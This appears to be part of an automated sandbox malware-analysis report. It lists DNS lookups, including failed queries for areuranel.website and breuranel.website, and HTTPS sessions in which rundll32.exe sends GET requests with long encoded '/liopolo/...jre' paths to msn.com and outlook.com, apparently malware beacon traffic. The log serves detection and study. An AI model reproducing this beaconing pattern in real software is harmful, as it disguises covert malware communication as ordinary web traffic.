Oct 11, 2021 22:36:59.048182011 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2e | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.98.175.18 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:59.048182011 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2e | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.212.34 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:59.048182011 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2e | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.137.98 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:15.320671082 CEST | 8.8.8.8 | 192.168.2.7 | 0x9968 | Name error (3) | areuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:19.310636997 CEST | 8.8.8.8 | 192.168.2.7 | 0x5d7e | Name error (3) | areuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:35.972763062 CEST | 8.8.8.8 | 192.168.2.7 | 0xe451 | No error (0) | msn.com |  | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:36.473367929 CEST | 8.8.8.8 | 192.168.2.7 | 0xe936 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:37:39.395886898 CEST | 8.8.8.8 | 192.168.2.7 | 0x173d | No error (0) | msn.com |  | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:39.864120007 CEST | 8.8.8.8 | 192.168.2.7 | 0xec9d | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:37:57.033107042 CEST | 8.8.8.8 | 192.168.2.7 | 0x1d30 | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:00.137804031 CEST | 8.8.8.8 | 192.168.2.7 | 0x454f | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.218822002 CEST | 8.8.8.8 | 192.168.2.7 | 0xe5e8 | No error (0) | outlook.com |  | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | www.outlook.com | outlook.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.219.162 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.137.242 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.98.175.2 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.938257933 CEST | 8.8.8.8 | 192.168.2.7 | 0x568a | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.137.162 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:18.100589991 CEST | 8.8.8.8 | 192.168.2.7 | 0xaee3 | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:18.100589991 CEST | 8.8.8.8 | 192.168.2.7 | 0xaee3 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:18.100589991 CEST | 8.8.8.8 | 192.168.2.7 | 0xaee3 | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:18.100589991 CEST | 8.8.8.8 | 192.168.2.7 | 0xaee3 | No error (0) | FRA-efz.ms-acdc.office.com |  | 52.97.137.114 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:18.100589991 CEST | 8.8.8.8 | 192.168.2.7 | 0xaee3 | No error (0) | FRA-efz.ms-acdc.office.com |  | 52.97.178.34 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:18.100589991 CEST | 8.8.8.8 | 192.168.2.7 | 0xaee3 | No error (0) | FRA-efz.ms-acdc.office.com |  | 52.98.208.18 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.196131945 CEST | 8.8.8.8 | 192.168.2.7 | 0xf49 | No error (0) | outlook.com |  | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | www.outlook.com | outlook.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.219.162 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.137.242 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.98.175.2 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.911417961 CEST | 8.8.8.8 | 192.168.2.7 | 0x1000 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.137.162 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:21.069540977 CEST | 8.8.8.8 | 192.168.2.7 | 0x8706 | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:21.069540977 CEST | 8.8.8.8 | 192.168.2.7 | 0x8706 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:21.069540977 CEST | 8.8.8.8 | 192.168.2.7 | 0x8706 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:38:21.069540977 CEST | 8.8.8.8 | 192.168.2.7 | 0x8706 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.98.214.82 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:21.069540977 CEST | 8.8.8.8 | 192.168.2.7 | 0x8706 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.98.171.242 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:21.069540977 CEST | 8.8.8.8 | 192.168.2.7 | 0x8706 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.218.66 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:21.069540977 CEST | 8.8.8.8 | 192.168.2.7 | 0x8706 | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.137.66 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• msn.com
• outlook.com
• www.outlook.com
• outlook.office365.com

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49749 | 13.82.28.61 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:36:12 UTC | 0 | OUT | GET /mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 20:36:12 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 20:36:12 GMT
Connection: close
Content-Length: 389
2021-10-11 20:36:12 UTC | 0 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtd


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49751 | 13.82.28.61 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:36:15 UTC | 1 | OUT | GET /mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 20:36:15 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 20:36:15 GMT
Connection: close
Content-Length: 403
2021-10-11 20:36:15 UTC | 2 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRop


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.7 | 49842 | 40.97.161.50 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:38:17 UTC | 14 | OUT | GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 20:38:17 UTC | 14 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre
Server: Microsoft-IIS/10.0
request-id: c9696fea-a1bd-d430-e498-9cfe61c858d9
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR11CA0044
X-RequestId: 8a77e1fc-4c94-4f4f-98ff-62d86521ce71
MS-CV: 6m9pyb2hMNTkmJz+YchY2Q.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR11CA0044
Date: Mon, 11 Oct 2021 20:38:17 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.7 | 49843 | 52.97.219.162 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:38:18 UTC | 15 | OUT | GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com
2021-10-11 20:38:18 UTC | 15 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre
Server: Microsoft-IIS/10.0
request-id: 9e790eb8-ae6c-5e26-169b-860898d1eb64
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AS8PR04CA0058
X-RequestId: 2a1ad6a3-6783-4f2a-b35a-c18784caad97
MS-CV: uA55nmyuJl4Wm4YImNHrZA.0
X-Powered-By: ASP.NET
X-FEServer: AS8PR04CA0058
Date: Mon, 11 Oct 2021 20:38:18 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.7 | 49844 | 52.97.137.114 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:38:18 UTC | 16 | OUT | GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com
2021-10-11 20:38:18 UTC | 16 | IN | HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 85b7812e-0a7c-b961-2cc4-adf543fab5ae
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: VI1PR08CU010.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: VI1PR08CA0134.EURPRD08.PROD.OUTLOOK.COM
X-CalculatedBETarget: VI1PR06MB5455.EURPRD06.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: LoG3hXwKYbksxK31Q/q1rg.1.1
X-FEServer: VI1PR08CA0134
X-Powered-By: ASP.NET
X-FEServer: AS9PR06CA0260
Date: Mon, 11 Oct 2021 20:38:17 GMT
Connection: close
2021-10-11 20:38:18 UTC | 17 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.7 | 49845 | 40.97.161.50 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:38:20 UTC | 18 | OUT | GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 20:38:20 UTC | 19 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre
Server: Microsoft-IIS/10.0
request-id: 1ab8e1f4-4386-e5ac-c3ff-9b366d219903
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR11CA0025
X-RequestId: 31bda99b-9d4b-4a70-8929-0597b0921e1f
MS-CV: 9OG4GoZDrOXD/5s2bSGZAw.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR11CA0025
Date: Mon, 11 Oct 2021 20:38:20 GMT
Connection: close
                                                                                                                                                                      Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.7 | 49846 | 52.97.219.162 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:38:21 UTC | 19 | OUT | GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com
2021-10-11 20:38:21 UTC | 20 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre
Server: Microsoft-IIS/10.0
request-id: 15294223-cf17-390d-9f43-65caa9090b20
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AS8PR04CA0054
X-RequestId: 80f5dae1-9e15-4b93-a003-4ac2eda6c736
MS-CV: I0IpFRfPDTmfQ2XKqQkLIA.0
X-Powered-By: ASP.NET
X-FEServer: AS8PR04CA0054
Date: Mon, 11 Oct 2021 20:38:20 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.7 | 49847 | 52.98.214.82 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:38:21 UTC | 21 | OUT | GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com
2021-10-11 20:38:21 UTC | 21 | IN | HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 295ac203-bc6e-2f15-84bf-9c5b1de6eb11
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: AM9P193CU001.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: AM9P193CA0023.EURP193.PROD.OUTLOOK.COM
X-CalculatedBETarget: AM0PR05MB4915.eurprd05.prod.outlook.com
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: A8JaKW68FS+Ev5xbHebrEQ.1.1
X-FEServer: AM9P193CA0023
X-Powered-By: ASP.NET
X-FEServer: AS9PR05CA0054
Date: Mon, 11 Oct 2021 20:38:20 GMT
Connection: close
2021-10-11 20:38:21 UTC | 22 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49771 | 40.97.161.50 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
